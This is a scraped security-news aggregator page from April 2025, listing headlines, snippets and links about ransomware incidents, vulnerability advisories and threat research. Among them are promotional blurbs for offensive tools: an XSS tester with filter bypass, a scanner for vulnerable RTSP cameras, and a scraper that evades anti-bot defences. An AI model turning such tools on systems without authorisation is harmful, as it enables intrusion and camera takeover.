https://finance.yahoo.com/news/britains-m-says-cyber-attack-161152307.html
M&S issues update after cyber attack leaves stores with empty shelves - Yahoo News UK
The cyber attack that first hit M&S stores last week is causing availability problems in some shops.
https://uk.news.yahoo.com/m-issues-cyber-attack-leaves-151231784.html
DuPage County, Ill., Cyber Attack Shutters Justice Systems - GovTech
DuPage County, Ill., Cyber Attack Shutters Justice Systems. The ransomware incident has forced county officials to take offline systems belonging ...
https://www.govtech.com/security/dupage-county-ill-cyber-attack-shutters-justice-systems
Pakistani Hackers Carried Out a Cyber Attack! - short-videos AajTak
Pakistani hackers' doing: a cyber attack on sites linked to the Indian Army!
https://www.aajtak.in/short-videos/video/pakistani-hackers-tried-to-launch-a-cyber-attack-on-indian-army-related-sites-2228757-2025-04-29
Spain and Portugal blackouts latest: Power cuts not caused by cyber attack, Spanish grid says
Spain and Portugal blackouts latest: Power cuts not caused by cyber attack, Spanish grid says - but investigation launched. Power has mostly been ...
https://news.sky.com/story/spain-and-portugal-blackouts-latest-power-cuts-not-caused-by-cyber-attack-spanish-grid-says-13357538
Scattered Spider on the hook for M&S cyber attack | Computer Weekly
The infamous Scattered Spider hacking collective may have been behind the ongoing cyber attack on Marks and Spencer that has crippled systems at ...
https://www.computerweekly.com/news/366623453/Scattered-Spider-on-the-hook-for-MS-cyber-attack
Need public records from the city of Abilene? It'll be lots longer due to the cyber attack
Federal authorities are investigating the cyber attack. Filing an initial catastrophe notice allows the city to forego responding to citizens' open ...
https://www.reporternews.com/story/news/2025/04/29/city-of-abilene-extends-cyber-attack-emergency-status/83349475007/
Iberian blackout raises fears of growing cyber-attack risks - SecurityBrief UK
A widespread blackout in Spain and Portugal sparks debate over whether a cyber-attack caused the outage, despite initial reports of a technical ...
https://securitybrief.co.uk/story/iberian-blackout-raises-fears-of-growing-cyber-attack-risks
Who is Scattered Spider, the group being linked to the M&S cyber attack? | ITV News
Marks and Spencer are still struggling with the fall out of a cyber attack that forced them to pause all online orders. | ITV National News.
https://www.itv.com/news/2025-04-29/who-is-scattered-spider-the-group-being-linked-to-the-m-and-s-cyber-attack
News from Two Days Ago (Specialised Press)
How Postal Code Data Impacts Cybersecurity, Privacy and Fraud Prevention
Postal codes now play a key role in cybersecurity, fraud prevention, and digital identity verification, raising new concerns…
https://hackread.com/postal-code-data-impact-cybersecurity-fraud-prevention/
Announcing New Legit ASPM AI Capabilities
Get details on Legit's new AI capabilities.
https://www.legitsecurity.com/blog/announcing-new-legit-aspm-ai-capabilities
SuperCard X Malware Attacks Android With NFC Relay Attacks
Android users need to stay wary of a new threat, particularly when dealing with payment…
SuperCard X Malware Attacks Android With NFC Relay Attacks on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2025/04/28/supercard-x-malware-attacks-android-with-nfc-relay-attacks/
Cookie-Bite Attack Demoes Extension Exploit To Steal Browser Cookies
Researchers have devised a new attack strategy “Cookie-Bite” demonstrating cookie theft via malicious browser extensions.…
Cookie-Bite Attack Demoes Extension Exploit To Steal Browser Cookies on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2025/04/28/cookie-bite-attack-demoes-extension-exploit-to-steal-browser-cookies/
SAP NetWeaver Visual Composer Flaw Under Active Exploitation
CVE-2025-31324 is a maximum severity bug that attackers exploited weeks before SAP released a patch for it.
https://www.darkreading.com/cyberattacks-data-breaches/sap-netweaver-visual-composer-flaw-active-exploitation
The Turmoil Following BreachForums Shutdown: Confusion, Risks, and a New Beginning
BreachForums, a major data leak marketplace, shut down on April 15 after a MyBB 0-day exploit allowed law enforcement infiltration. On April 15, BreachForums, one of the top marketplaces for stolen data, abruptly shut down, fueling widespread speculation. Rumors ranged from FBI raids and the arrest of the administrator. In the aftermath, several alternative forums […]
https://securityaffairs.com/177146/hacking/the-turmoil-following-breachforums-shutdown-confusion-risks-and-a-new-beginning.html
Marks & Spencer breach linked to Scattered Spider ransomware attack
Ongoing outages at British retail giant Marks & Spencer are caused by a ransomware attack believed to be conducted by threat actors known as "Scattered Spider" BleepingComputer has learned from multiple sources. [...]
https://www.bleepingcomputer.com/news/security/marks-and-spencer-breach-linked-to-scattered-spider-ransomware-attack/
Cloud Security Alliance Transforms IT Compliance and Assurance with Launch of Compliance Automation Revolution (CAR)
CAR to solve real-world compliance problems with practical and effective solutions
SAN FRANCISCO (RSA Conference) and SEATTLE – April 29, 2025 – Today's organizations have to comply with hundreds of data security and privacy laws, while grappling with an influx of even more regulations thanks to the rise of Artificial Intelligence (AI). Making matters more challenging, the proliferation of data and technology continues to increase the required scope of compliance efforts. Organizations...
https://cloudsecurityalliance.org/articles/csa-transforms-it-compliance-and-assurance-with-launch-of-compliance-automation-revolution
USN-7467-2: libxml2 vulnerabilities
USN-7467-1 fixed several vulnerabilities in libxml2. This update provides
the corresponding update for Ubuntu 16.04 LTS and Ubuntu 18.04 LTS.
Original advisory details:
It was discovered that the libxml2 Python bindings incorrectly handled
certain return values. An attacker could possibly use this issue to cause
libxml2 to crash, resulting in a denial of service. (CVE-2025-32414)
It was discovered that libxml2 incorrectly handled certain memory
operations. A remote attacker could possibly use this issue to cause
libxml2 to crash, resulting in a denial of service. (CVE-2025-32415)
https://ubuntu.com/security/notices/USN-7467-2
Earth Kurma APT is actively targeting government and telecommunications orgs in Southeast Asia
Earth Kurma APT carried out a sophisticated campaign against government and telecommunications sectors in Southeast Asia. Trend Research exposed the Earth Kurma APT campaign targeting Southeast Asia's government and telecom sectors. Threat actors use custom malware, rootkits, and cloud storage for espionage, credential theft, and data exfiltration, posing a high business risk with advanced evasion […]
https://securityaffairs.com/177125/apt/earth-kurma-apt-is-actively-targeting-government-and-telecommunications-orgs-in-southeast-asia.html
Hitachi Vantara takes servers offline after Akira ransomware attack
Hitachi Vantara, a subsidiary of Japanese multinational conglomerate Hitachi, was forced to take servers offline over the weekend to contain an Akira ransomware attack. [...]
https://www.bleepingcomputer.com/news/security/hitachi-vantara-takes-servers-offline-after-akira-ransomware-attack/
The Evolving Role of GDPR Auditors
Originally published by Scrut Automation.
Written by Nicholas Muy.
The evolving role of GDPR Auditors
As businesses continue to rely more on data, the need for strong privacy and compliance measures has never been greater.
The General Data Protection Regulation (GDPR) safeguards personal data, but staying compliant is an ongoing challenge amid evolving regulations and technology.
Non-compliance risks hefty fines (like LinkedIn's €310 million fine in 2024), but bey...
https://cloudsecurityalliance.org/articles/the-evolving-role-of-gdpr-auditors
VeriSource now says February data breach impacts 4 million people
Employee benefits administration firm VeriSource Services is warning that a data breach exposed the personal information of four million people. [...]
https://www.bleepingcomputer.com/news/security/verisource-now-says-february-data-breach-impacts-4-million-people/
BreachForums Displays Message About Shutdown, Cites MyBB 0day Flaw
BreachForums posts a PGP-signed message explaining the sudden April 2025 shutdown. Admins cite MyBB 0day vulnerability impacting the…
https://hackread.com/breachforums-displays-message-shutdown-mybb-0day-flaw/
Cloud Security Alliance Issues Top Threats to Cloud Computing Deep Dive 2025
Case studies articulate cloud computing's most significant and pressing issues
SAN FRANCISCO (RSA Conference) and SEATTLE - April 29, 2025 - The Cloud Security Alliance (CSA), the world's leading organization dedicated to defining standards, certifications and best practices to help ensure a secure cloud computing environment, today issued the Top Threats to Cloud Computing Deep Dive 2025. The report examines eight real-life case studies involving, among others, a multinatio...
https://cloudsecurityalliance.org/articles/cloud-security-alliance-issues-top-threats-to-cloud-computing-deep-dive-2025
USN-7469-2: Apache Tomcat vulnerability
USN-7469-1 fixed a vulnerability in Apache Traffic Server. This
update provides the corresponding updates for Apache Tomcat.
Original advisory details:
It was discovered that Apache Traffic Server exhibited poor server
resource management in its HTTP/2 protocol. An attacker could possibly
use this issue to cause Apache Traffic Server to crash, resulting in
a denial of service.
https://ubuntu.com/security/notices/USN-7469-2
Huntress Unveils Enhanced Identity Threat Detection & Response Solution as New Research Warns of Rising Identity-Based Attacks
Huntress today announced major enhancements to its Managed Identity Threat Detection and Response (ITDR) solution, delivering a purpose-built answer to disrupt hacker identity tradecraft. Alongside the launch, Huntress also revealed new research underscoring the growing threat of identity-based attacks and organisations’ struggles to defend against them. Based on findings from an independent UserEvidence survey of […]
The post Huntress Unveils Enhanced Identity Threat Detection & Response Solution as New Research Warns of Rising Identity-Based Attacks appeared first on IT Security Guru.
https://www.itsecurityguru.org/2025/04/28/huntress-unveils-enhanced-identity-threat-detection-response-solution-as-new-research-warns-of-rising-identity-based-attacks/?utm_source=rss&utm_medium=rss&utm_campaign=huntress-unveils-enhanced-identity-threat-detection-response-solution-as-new-research-warns-of-rising-identity-based-attacks
USN-7469-1: Apache Traffic Server vulnerability
It was discovered that Apache Traffic Server exhibited poor server
resource management in its HTTP/2 protocol. An attacker could possibly
use this issue to cause Apache Traffic Server to crash, resulting in
a denial of service.
https://ubuntu.com/security/notices/USN-7469-1
USN-7468-1: Linux kernel (Azure, N-Series) vulnerabilities
Michael Randrianantenaina discovered that the Bluetooth driver in the Linux
Kernel contained an improper access control vulnerability. A nearby
attacker could use this to connect a rogue device and possibly execute
arbitrary code. (CVE-2024-8805)
Attila Szász discovered that the HFS+ file system implementation in the
Linux Kernel contained a heap overflow vulnerability. An attacker could use
a specially crafted file system image that, when mounted, could cause a
denial of service (system crash) or possibly execute arbitrary code.
(CVE-2025-0927)
It was discovered that the CIFS network file system implementation in the
Linux kernel did not properly verify the target namespace when handling
upcalls. An attacker could use this to expose sensitive information.
(CVE-2025-2312)
Several security...
https://ubuntu.com/security/notices/USN-7468-1
USN-7459-2: Linux kernel (GCP) vulnerabilities
Jann Horn discovered that the watch_queue event notification subsystem in
the Linux kernel contained an out-of-bounds write vulnerability. A local
attacker could use this to cause a denial of service (system crash) or
escalate their privileges. (CVE-2022-0995)
Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
- ARM64 architecture;
- MIPS architecture;
- PowerPC architecture;
- RISC-V architecture;
- S390 architecture;
- SuperH RISC architecture;
- User-Mode Linux (UML);
- x86 architecture;
- Block layer subsystem;
- Cryptographic API;
- ACPI drivers;
- Drivers core;
- RAM backed block device driver;
- Virtio block driver;
- Data acquisition...
https://ubuntu.com/security/notices/USN-7459-2
AI, Automation, and Dark Web Fuel Evolving Threat Landscape
Attackers are leveraging the benefits of new technology and the availability of commodity tools, credentials, and other resources to develop sophisticated attacks more quickly than ever, putting defenders on their heels.
https://www.darkreading.com/remote-workforce/ai-automation-dark-web-fuel-evolving-threat-landscape
Forget the Stack; Focus on Control
Security teams are under more pressure than ever — and cybersecurity debt is adding fuel to the fire. While it can't be eliminated overnight, it can be managed.
https://www.darkreading.com/vulnerabilities-threats/forget-stack-focus-control
Court Dismisses Criminal Charges Against VPN Executive, Affirms No-Log Policy
Toronto, Canada, 28th April 2025, CyberNewsWire
https://hackread.com/court-dismisses-criminal-charges-against-vpn-executive-no-log-policy/
Introducing Rapid7's Exposure Assessment Platform Buyer's Guide
To help organizations navigate this rapidly changing threat landscape, we are excited to introduce the Exposure Assessment Platform (EAP) Buyer's Guide.
https://blog.rapid7.com/2025/04/28/introducing-rapid7s-exposure-assessment-platform-buyers-guide/
Employee monitoring app exposes users, leaks 21+ million screenshots
WorkComposer, an employee monitoring app, has leaked millions of screenshots through an unprotected AWS S3 bucket.
https://www.malwarebytes.com/blog/news/2025/04/employee-monitoring-app-exposes-users-leaks-21-million-screenshots
Global Cybersecurity Market To Reach $1 Trillion Annually By 2031
This week in cybersecurity from the editors at Cybercrime Magazine – Read the press release from EIN Presswire. Sausalito, Calif. – Apr. 28, 2025. The imperative to protect increasingly digitized businesses, governments, schools, Internet of Things (IoT) devices, and consumers from cybercrime will propel global spending
The post Global Cybersecurity Market To Reach $1 Trillion Annually By 2031 appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/global-cybersecurity-market-to-reach-1-trillion-annually-by-2031/
Scrapling - An Undetectable, Powerful, Flexible, High-Performance Python Library That Makes Web Scraping Simple And Easy Again!
Dealing with failing web scrapers due to anti-bot protections or website changes? Meet Scrapling. Scrapling is a high-performance, intelligent web scraping library for Python that automatically adapts to website changes while significantly outperforming popular alternatives. For both beginners and experts, Scrapling provides powerful features while maintaining simplicity.
>> from scrapling.defaults import Fetcher, AsyncFetcher, StealthyFetcher, PlayWrightFetcher
# Fetch websites' source under the radar!
>> page = StealthyFetcher.fetch('https://example.com', headless=True, network_idle=True)
>> print(page.status)
200
>> products = page.css('.product', auto_save=True) # Scrape data that survives website design changes!
>> # Later, if the website structure changes, pass...
http://www.kitploit.com/2025/04/scrapling-undetectable-powerful.html
USN-7467-1: libxml2 vulnerabilities
It was discovered that the libxml2 Python bindings incorrectly handled
certain return values. An attacker could possibly use this issue to cause
libxml2 to crash, resulting in a denial of service. (CVE-2025-32414)
It was discovered that libxml2 incorrectly handled certain memory
operations. A remote attacker could possibly use this issue to cause
libxml2 to crash, resulting in a denial of service. (CVE-2025-32415)
https://ubuntu.com/security/notices/USN-7467-1
DoJ Data Security Program Highlights Data-Sharing Challenges
The Department of Justice has announced compliance rules for its Data Security Program that will require organizations to reexamine how they do business and with whom.
https://www.darkreading.com/cyber-risk/doj-data-security-program-data-sharing-challenge
Understanding the Linux Filesystem Case Sensitivity Debate
Linux's case-sensitive filesystems have long been seen as essential to the reliability and security of our much-loved OS. Still, recent discussions, led by Linus Torvalds' opposition to case insensitivity, highlight potential dangers associated with deviating from this norm. While case-insensitive filesystems may be prevalent elsewhere (such as Windows or macOS), their insensitivity can introduce security flaws that lead to filename ambiguities, privilege escalation risks, and path traversal exploits, creating opportunities for malicious actors in otherwise mundane operations.
https://linuxsecurity.com/features/features/linux-filesystem-case-sensitivity-debate
Darcula Phishing Kit Uses AI to Evade Detection, Experts Warn
Darcula phishing platform adds AI to create multilingual scam pages easily. Netcraft warns of rising risks from Darcula-Suite…
https://hackread.com/darcula-phishing-kit-uses-ai-to-evade-detection/
USN-7465-1: Mistral vulnerabilities
It was discovered that Mistral incorrectly handled nested anchors in YAML
files. An attacker could possibly use this issue to cause a denial of
service. This issue only affected Ubuntu 18.04 LTS. (CVE-2018-16848)
Pierre Gaxatte discovered that Mistral incorrectly handled erroneous SSH
private key filename commands. An attacker could possibly use this issue to
expose sensitive information. (CVE-2018-16849)
It was discovered that Mistral incorrectly handled the permissions of
sensitive log files. An attacker could possibly use this issue to expose
sensitive information. This issue only affected Ubuntu 18.04 LTS.
(CVE-2019-3866)
https://ubuntu.com/security/notices/USN-7465-1
Overcoming SaaS Security Risks with Open-Source Tools
The explosive growth of Software-as-a-Service (SaaS) applications in recent years has ushered in new conveniences, and new risks. For us Linux security admins, safeguarding SaaS environments isn't just a nice-to-have; it's a critical responsibility. These cloud-based tools often integrate deeply with infrastructure, access sensitive data, and interact with APIs, which means any security gaps could ripple into the core systems that we Linux admins strive to protect. Add to this the rise of shadow IT, overly permissive access levels, and the ever-growing number of machine identities, and the complexities of modern SaaS security become clear.
https://linuxsecurity.com/features/features/open-source-saas-security-tools
Active exploitation of SAP NetWeaver Visual Composer CVE-2025-31324
A critical SAP NetWeaver zero-day vulnerability (CVE-2025-31324) that allows for full SAP server compromise is being actively exploited in the wild.
https://blog.rapid7.com/2025/04/28/etr-active-exploitation-of-sap-netweaver-visual-composer-cve-2025-31324/
A large-scale phishing campaign targets WordPress WooCommerce users
A large-scale phishing campaign targets WordPress WooCommerce users with a fake security alert urging them to download a ‘critical patch’ hiding a backdoor. Patchstack researchers uncovered a large-scale phishing campaign targeting WordPress WooCommerce users with a fake security alert. Threat actors urge recipients to download a “critical patch” that hides a backdoor. The experts noted […]
https://securityaffairs.com/177115/hacking/a-large-scale-phishing-campaign-targets-wordpress-woocommerce-users.html
JokerOTP Dismantled After 28,000 Phishing Attacks, 2 Arrested
JokerOTP dismantled after 28,000 phishing attacks across 13 countries; UK and Dutch police arrest two suspects linked to £7.5M cyber fraud.
https://hackread.com/jokerotp-dismantled-28000-phishing-attacks-2-arrested/
Organisations Unprepared For Age of Quantum Computing
New research by ISACA has found that quantum computing, and the changes it will bring, is broadly welcomed by over half of cyber and IT professionals as a way of creating new opportunities for business. A further 44% believe quantum will create revolutionary innovations. But despite the expected impact of quantum computing, organisations are not […]
The post Organisations Unprepared For Age of Quantum Computing appeared first on IT Security Guru.
https://www.itsecurityguru.org/2025/04/28/quantum-computings-rapid-rise-is-a-risk-to-cybersecurity-and-business-stability-but-organisations-are-unprepared/?utm_source=rss&utm_medium=rss&utm_campaign=quantum-computings-rapid-rise-is-a-risk-to-cybersecurity-and-business-stability-but-organisations-are-unprepared
CIOs Say Security Systems Not Delivering Value For Money, Too Complex To Manage
New research by Logicalis reveals that CIOs are struggling to derive value from security investments amid changing threat landscape. According to its annual CIO Report, which surveyed 1,000 global IT leaders, more than half say their security patch systems have become too complex to manage effectively. The top concerns for CIOs include malware and ransomware […]
The post CIOs Say Security Systems Not Delivering Value For Money, Too Complex To Manage appeared first on IT Security Guru.
https://www.itsecurityguru.org/2025/04/28/cios-say-security-systems-not-delivering-value-for-money-too-complex-to-manage/?utm_source=rss&utm_medium=rss&utm_campaign=cios-say-security-systems-not-delivering-value-for-money-too-complex-to-manage
How safe and secure is your iPhone really?
Your iPhone isn't necessarily as invulnerable to security threats as you may think. Here are the key dangers to watch out for and how to harden your device against bad actors.
https://www.welivesecurity.com/en/mobile-security/how-safe-secure-iphone/
PoC rootkit Curing evades traditional Linux detection systems
Researchers created a PoC rootkit called Curing that uses Linux's io_uring feature to evade traditional system call monitoring. Armo researchers have demonstrated a proof-of-concept (PoC) rootkit named Curing that relies on Linux asynchronous I/O mechanism io_uring to bypass traditional system call monitoring. “Curing is a POC of a rootkit that uses io_uring to perform different tasks without using any syscalls, […]
https://securityaffairs.com/177098/hacking/poc-rootkit-curing-evades-traditional-linux-detection-systems.html
MIWIC25: Caroline Kamper, Strategic Cyber Threat Intelligence Analyst, SecAlliance
Organised by Eskenzi PR in media partnership with the IT Security Guru, the Most Inspiring Women in Cyber Awards aim to shed light on the remarkable women in our industry. The following is a feature on one of 2024's Top 20 women selected by an esteemed panel of judges. Presented in a Q&A format, the nominee's answers are […]
The post MIWIC25: Caroline Kamper, Strategic Cyber Threat Intelligence Analyst, SecAlliance appeared first on IT Security Guru.
https://www.itsecurityguru.org/2025/04/28/miwic25-caroline-kamper-strategic-cyber-threat-intelligence-analyst-secalliance/?utm_source=rss&utm_medium=rss&utm_campaign=miwic25-caroline-kamper-strategic-cyber-threat-intelligence-analyst-secalliance
Attackers chained Craft CMS zero-days attacks in the wild
Orange Cyberdefense’s CSIRT reported that threat actors exploited two vulnerabilities in Craft CMS to breach servers and steal data. Orange Cyberdefense’s CSIRT warns that threat actors chained two Craft CMS vulnerabilities in recent attacks. Orange experts discovered the flaws while investigating a server compromise. The two vulnerabilities, tracked as CVE-2025-32432 and CVE-2024-58136, are respectively a […]
https://securityaffairs.com/177085/hacking/attackers-chained-craft-cms-zero-days-attacks-in-the-wild.html
ASUS Fixed Critical Auth Bypass Vulnerability In AiCloud Routers
ASUS recently patched a vulnerability in routers enabled with AiCloud that could allow executing unauthorized…
ASUS Fixed Critical Auth Bypass Vulnerability In AiCloud Routers on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2025/04/28/asus-fixed-critical-auth-bypass-vulnerability-in-aicloud-routers/
A week in security (April 21 – April 27)
A list of topics we covered in the week of April 21 to April 27 of 2025
https://www.malwarebytes.com/blog/news/2025/04/a-week-in-security-april-21-april-27
News from previous days
Mobile Security & Malware Issue 4th Week of April, 2025
ASEC Blog publishes “Mobile Security & Malware Issue 4th Week of April, 2025”
https://asec.ahnlab.com/en/87699/
VulnKnox - A Go-based Wrapper For The KNOXSS API To Automate XSS Vulnerability Testing
VulnKnox is a powerful command-line tool written in Go that interfaces with the KNOXSS API. It automates the process of testing URLs for Cross-Site Scripting (XSS) vulnerabilities using the advanced capabilities of the KNOXSS engine.
Features
Supports pipe input for passing file lists and echoing URLs for testing
Configurable retries and timeouts
Supports GET, POST, and BOTH HTTP methods
Advanced Filter Bypass (AFB) feature
Flash Mode for quick XSS polyglot testing
CheckPoC feature to verify the proof of concept
Concurrent processing with configurable parallelism
Custom headers support for authenticated requests
Proxy support
Discord webhook integration for notifications
Detailed output with color-coded results
Installation
go install github.com/iqzer0/vulnknox@latest...
http://www.kitploit.com/2025/04/vulnknox-go-based-wrapper-for-knoxss.html
I Had Some Adventures with Alice and Bob (Podcast)! Also, what's next for Auntie Lesley?
Hi pals! It’s been a busy few months for me. Next week, I make my big move to Australia, so my blog might drop off for a bit while I get settled. I’ve gotten to cram in some final North American conference speaking appearances in Halifax (AtlSecCon), Milwaukee (CypherCon), and Chicago (ChiBrrCon). I’ve also been […]
https://tisiphone.net/2025/04/26/i-had-some-adventures-with-alice-and-bob-podcast/
Planet Technology Industrial Switch Flaws Risk Full Takeover – Patch Now
Immersive security researchers discovered critical vulnerabilities in Planet Technology network management and switch products, allowing full device control.…
https://hackread.com/planet-technology-industrial-switch-flaws-full-takeover/
Camtruder - Advanced RTSP Camera Discovery and Vulnerability Assessment Tool
Camtruder is a high-performance RTSP camera discovery and vulnerability assessment tool written in Go. It efficiently scans and identifies vulnerable RTSP cameras across networks using various authentication methods and path combinations, with support for both targeted and internet-wide scanning capabilities.
🌟 Key Features
Advanced Scanning Capabilities: single IP targeting; CIDR range scanning; file-based target lists; pipe input support; internet-wide scanning with customizable limits; intelligent port discovery; location-based search using the RIPE database; raw CIDR output for integration with other tools
Screenshot Capability: capture screenshots of discovered cameras; automatic saving of JPEG images; requires ffmpeg installation; configurable output directory
Location-Based Search: Search...
http://www.kitploit.com/2025/04/camtruder-advanced-rtsp-camera.html
SAP NetWeaver Flaw Scores 10.0 Severity as Hackers Deploy Web Shells
A critical vulnerability (CVE-2025-31324) in SAP NetWeaver Visual Composer puts systems at risk of full compromise. Learn how…
https://hackread.com/sap-netweaver-flaw-severity-hackers-deploy-web-shells/
How SBOMs power secure software acquisition | Sonatype Blog
CISA's Supply Chain Integrity Month reminds us of an undeniable truth about modern software development: transparency in software supply chains is no longer optional. The theme of week 4 is "Transparency: Securing Hardware and Software Across the Supply Chain." With more than 90% of modern software applications relying on open source, this message couldn't be more timely. Transparency is at the heart of the current trend in legislative action, which puts a spotlight on the way agencies evaluate, purchase, and monitor software.
https://www.sonatype.com/blog/how-sboms-power-secure-software-acquisition
Critical Commvault Flaw Allows Full System Takeover – Update NOW
Enterprises using Commvault Innovation Release are urged to patch immediately against CVE-2025-34028. This critical flaw allows attackers to…
https://hackread.com/critical-commvault-flaw-allows-full-system-takeover/
Metasploit Wrap-Up 04/25/2025
AD CS workflow improvement with new PKCS12 features
Given the increasing popularity of AD CS misconfiguration exploitation in recent years, Metasploit has been consistently improving its capabilities in this area. This week's release introduces a new certs command to the msfconsole, enabling users to manage PKCS12 certificates stored in
https://blog.rapid7.com/2025/04/25/metasploit-wrap-up-04-25-2025/
Why We're Launching a Trusted AI Safety Knowledge Certification Program
Written by Anna Campbell Schorr, Training Program Director, Cloud Security Alliance.
Over the years, we've witnessed security paradigms evolve—from the early days of perimeter defense, to the rise of Zero Trust, and most recently, the challenges introduced by Artificial Intelligence (AI). AI is rapidly becoming a cornerstone of the enterprise landscape: according to The State of AI and Security Survey Report by the Cloud Security Alliance (CSA), 69% of organizations are alre...
https://cloudsecurityalliance.org/articles/why-we-re-launching-a-trusted-ai-safety-knowledge-certification-program
Mobile Applications: A Cesspool of Security Issues
An analysis of more than a half-million mobile apps find encryption problems, privacy issues, and known vulnerabilities in third-party code. What can users and developers do?
https://www.darkreading.com/remote-workforce/mobile-applications-cesspool-security-issues
Check Point and Illumio Team Up to Advance Zero Trust with Unified Security and Threat Prevention
Check Point Software Technologies and Illumio have announced a strategic partnership aimed at helping organisations enhance their Zero Trust strategies and proactively contain cyber threats. The integration brings together Check Point's Infinity Platform, which includes Quantum Force firewalls, Infinity ThreatCloud AI, and AI-powered Security Management, with Illumio's Segmentation and Insights capabilities. The result is a […]
The post Check Point and Illumio Team Up to Advance Zero Trust with Unified Security and Threat Prevention appeared first on IT Security Guru.
https://www.itsecurityguru.org/2025/04/25/check-point-and-illumio-team-up-to-advance-zero-trust-with-unified-security-and-threat-prevention/?utm_source=rss&utm_medium=rss&utm_campaign=check-point-and-illumio-team-up-to-advance-zero-trust-with-unified-security-and-threat-prevention
AI is getting “creepy good” at geo-guessing
After hearing about ChatGPT o3's ability at geo-guessing, we decided to run some tests, and the tested AIs didn't fail to amaze us.
https://www.malwarebytes.com/blog/news/2025/04/ai-is-getting-creepy-good-at-geo-guessing
Advanced Cryptography: new approaches to data privacy
A new NCSC paper discusses the suitability of emerging Advanced Cryptography techniques.
https://www.ncsc.gov.uk/blog-post/advanced-cryptography-new-approaches-to-data-privacy
Drained Wallets: How to Protect Your Assets From Advanced Phishing Scams
With the rapid expansion of technological advancements, there have been many great innovations across various industries that have had a positive impact on the world. However, these advancements also mean the latest technologies may not always be used for legal or ethical activities, making being online a very risky business these days. Phishing is a […]
The post Drained Wallets: How to Protect Your Assets From Advanced Phishing Scams appeared first on IT Security Guru.
https://www.itsecurityguru.org/2025/04/25/drained-wallets-how-to-protect-your-assets-from-advanced-phishing-scams/?utm_source=rss&utm_medium=rss&utm_campaign=drained-wallets-how-to-protect-your-assets-from-advanced-phishing-scams
Deep Dive Into Major Dating App Breach That Exposed Private Images
This week in cybersecurity from the editors at Cybercrime Magazine. Listen to the Podcast. Sausalito, Calif. – Apr. 25, 2025 – TechRadar Pro recently reported that five dating apps exposed over 1.5 million private and explicit images after storing the images in cloud storage buckets without any password
The post Deep Dive Into Major Dating App Breach That Exposed Private Images appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/deep-dive-into-major-dating-app-breach-that-exposed-private-images/
Frogy2.0 - An Automated External Reconnaissance And Attack Surface Management (ASM) Toolkit
Frogy 2.0 is an automated external reconnaissance and Attack Surface Management (ASM) toolkit designed to map out an organization's entire internet presence. It identifies assets, IP addresses, web applications, and other metadata across the public internet and then smartly prioritizes them from highest (most attractive) to lowest (least attractive) from an attacker's playground perspective.
Features
Comprehensive recon: Aggregate subdomains and assets using multiple tools (CHAOS, Subfinder, Assetfinder, crt.sh) to map an organization's entire digital footprint.
Live asset verification: Validate assets with live DNS resolution and port scanning (using DNSX and Naabu) to confirm what is publicly reachable.
In-depth web recon: Collect detailed HTTP response data (via HTTPX) including...
http://www.kitploit.com/2025/04/frogy20-automated-external.html
Build smarter with AI and your software supply chain
AI adoption is reshaping how software gets built. From coding assistants to full-fledged agentic AI applications, developers now routinely rely on artificial intelligence in their workflows. But a subtler shift is also underway: the rise of open source AI/ML models as foundational components in modern software development.
https://www.sonatype.com/blog/build-smarter-with-ai-and-your-software-supply-chain
Making Security Invisible and Effective
Despite DevSecOps being a well-understood priority, many teams still find themselves getting security alerts too late. Developers often feel burdened rather than empowered, and security vulnerabilities may make their way into the final stages before a release. Traditional AppSec tools, while powerful, can create miscommunication between teams, forcing developers to step outside of their familiar […]
The post Making Security Invisible and Effective appeared first on IT Security Guru.
https://www.itsecurityguru.org/2025/04/25/making-security-invisible-effective/?utm_source=rss&utm_medium=rss&utm_campaign=making-security-invisible-effective
Triada strikes back
Kaspersky expert has discovered a new version of the Triada Trojan, with custom modules for Telegram, WhatsApp, TikTok, and other apps.
https://securelist.com/triada-trojan-modules-analysis/116380/
Deepfake 'doctors' take to TikTok to peddle bogus cures
Look out for AI-generated 'TikDocs' who exploit the public's trust in the medical profession to drive sales of sketchy supplements
https://www.welivesecurity.com/en/social-media/deepfake-doctors-tiktok-bogus-cures/
Commvault Command Center Path Traversal Vulnerability (CVE-2025-34028)
What is the Vulnerability? A critical path traversal vulnerability has been identified in Commvault's Command Center Innovation Release. The vulnerability, tracked as CVE-2025-34028, has been assigned a CVSS score of 9.0. This flaw allows unauthenticated remote attackers to upload specially crafted ZIP files. When these files are expanded by the server, they can lead to arbitrary code execution, potentially resulting in a complete system compromise. Commvault serves a diverse range of industries, including Healthcare, Financial Services, Manufacturing, and more, for securing data management and compliance, protecting financial data, and efficiently backing up data.
What is the recommended Mitigation? Commvault has addressed this vulnerability in the following patched versions: 11.38 and 11.38.25....
https://fortiguard.fortinet.com/threat-signal-report/6081
Erlang/OTP RCE (CVE-2025-32433)
What is the Vulnerability? A critical SSH vulnerability has recently been identified in the Erlang/Open Telecom Platform (OTP). The vulnerability, tracked as CVE-2025-32433, has been assigned a CVSS score of 10.0. It is unauthenticated, remotely exploitable, and requires low complexity to execute. Erlang/OTP is commonly found in IoT devices and telecommunications platforms, and is prominently used by companies such as Ericsson, WhatsApp, and Cisco, among others.
What is the recommended Mitigation? A security patch for OTP has been made available via GitHub. FortiGuard Labs strongly recommends that organizations prioritize applying the latest security updates.
What FortiGuard Coverage is available? • FortiGuard Labs has available IPS protection for CVE-2025-32433 which detects and blocks attack...
https://fortiguard.fortinet.com/threat-signal-report/6077
Cloud Security Alliance Honors CrowdStrike Founder and CEO George Kurtz with 2025 Philippe Courtot Leadership Award
Kurtz recognized for outstanding efforts in advancing cloud security, cybersecurity worldwide
SAN FRANCISCO (RSA Conference) and SEATTLE – April 28, 2025 – The Cloud Security Alliance (CSA), the world's leading organization dedicated to defining and raising awareness of best practices to help ensure a secure cloud computing environment, is thrilled to announce George Kurtz, founder and CEO of CrowdStrike, as the recipient of the Philippe Courtot Leadership Award for 2025. CSA's ann...
https://cloudsecurityalliance.org/articles/csa-honors-crowdstrike-founder-and-ceo-george-kurtz-with-2025-philippe-courtot-leadership-award
Understanding SAQ A and SAQ A-EP Eligibility: A Streamlined Approach to PCI DSS Compliance
Originally published by BARR Advisory.
